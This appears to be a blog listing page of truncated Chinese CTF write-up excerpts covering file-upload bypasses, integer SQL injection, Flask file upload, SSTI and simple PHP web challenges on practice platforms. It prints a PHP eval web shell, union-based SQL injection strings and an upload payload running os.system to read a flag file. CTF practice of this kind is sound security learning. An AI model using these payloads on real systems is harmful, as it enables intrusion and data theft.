ctf
文章平均质量分 52
独角授
这个作者很懒,什么都没留下…
展开
-
CTFHub_文件上传
CTFHub_文件上传文章目录CTFHub_文件上传0x01 无验证0x02 js前端验证0x03 .htaccess0x04 MIME绕过0x05 00截断0x06 双写后缀0x01 无验证打开页面如图示:上传一句话木马用蚁剑连接<?php @eval($_POST[cmd]);?>因为没有任何限制,就直接上传.php木马文件上传成功,显示上传文件相对路径,用蚁剑连接连接成功,可在/var/www/html下找到flag!0x02 js前端验证打开页面如图示:原创 2021-08-06 14:01:36 · 660 阅读 · 0 评论 -
CTFHub_SQL整数型注入(超详解)
CTFHub_SQL整数型注入(超详解)相信这个过程会帮助你理解sql注入!首先打开环境先尝试手注,已经说明是整数型,就直接查看字段数:-1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。接着判断显示位:-1 union select 1,2#然后查看数据库:-1 union select database(),2#接着获取sqli数据库中的表:-1 union select 1,grou原创 2021-07-26 10:50:39 · 1121 阅读 · 2 评论 -
BugKu_web_Flask_FileUpload
BugKu_web_Flask_FileUpload打开页面发现是一个文件上传点,尝试上传文件F12检查发现上传文件的类型只能为jpg,png形式的,而且提示说上传的文件会用python执行尝试随便上传一个图片,用bp抓包,将文件内容改为:import osos.system('cat /flag')若上传其他文件也可以,就要注意修改文件名后缀和Content-Type。拿到flag!...原创 2021-07-19 22:43:31 · 371 阅读 · 0 评论 -
BugKu_web Simple_SSTI
BugKu_web Simple_SSTISimple_SSTI_1打开页面如图示,根据提示要找到一个flag的参数先尝试构造payload,发现页面有所变化再用F12大法瞅瞅,发现有一行提示,在flask中经常设置一个secret_key变量查询后知道secret_key格式是config.SECRET_KEY,拿到flag!Simple_SSTI_2打开页面和1一样,说明是模板注入,而且构造的payload也被执行了上传错误语句发现是python3.7的flask模板注入在原创 2021-07-19 21:05:30 · 284 阅读 · 1 评论 -
BugKu_web新手题8-9
BugKu_web新手题8-9web8打开网页如图示有关函数:(1)@错误抑制符:@在PHP中叫错误抑制符,也就是用来屏蔽错误的。@之后的表达式如果出错误,是不提示错误信息的,如果不加@出错之后一般是会在浏览器中显示错误信息,加上之后浏览器中就不显示错误信息了。(2)$REQUEST是用来收取表单数据的超级全局变量。_可以通过 $_REQUEST[“name”]来访问表单值。(3)eval()函数在php中的作用是将参数字符串作为php代码运行。(4)show_source()是hi原创 2021-07-19 16:33:34 · 117 阅读 · 0 评论 -
BugKuCTF_社工-初步收集
社工-初步收集打开环境后,先bp抓包,检查也没有得到有用的信息。目录扫描试试找后台找到该后台,发现需要用户名和密码。先别急,找找其他有用信息在该网页主页发现点击辅助购买这个选项会出现这个界面,点击下载辅助会下载一个压缩包安装后想试试用Wireshark抓包不知道能不能得到些什么。。。抓包开始后随便填写个QQ号和密码,连续点击“开始”,会出现“哈哈,小别致你被骗了”这个弹框,这。。。就可以暂停仔细观察抓到的包,会发现疑似发包的邮箱和Base64加密的Pass解码成功!!!但就是不太原创 2021-06-01 17:08:48 · 1010 阅读 · 0 评论 -
BugKuCTF_web1-7
BugKu_web新手题web1看到滑稽脸,就想到F12大法,点击检查便就看到了flag哈哈,真的好基础,果然是新手题web2发现只能输入一个数字,还是想到F12大法点击检查,发现maxlength=1直接将1改为大于等于2的随机一个数字再输入结果就得到flag了!!!web3get传参what=flag即可得到flag!!!web4和3类似,不过是以POST方式传参的打开HackBar,POST传参what=flag得到flag!!!web5由于is_原创 2021-05-31 17:53:57 · 142 阅读 · 0 评论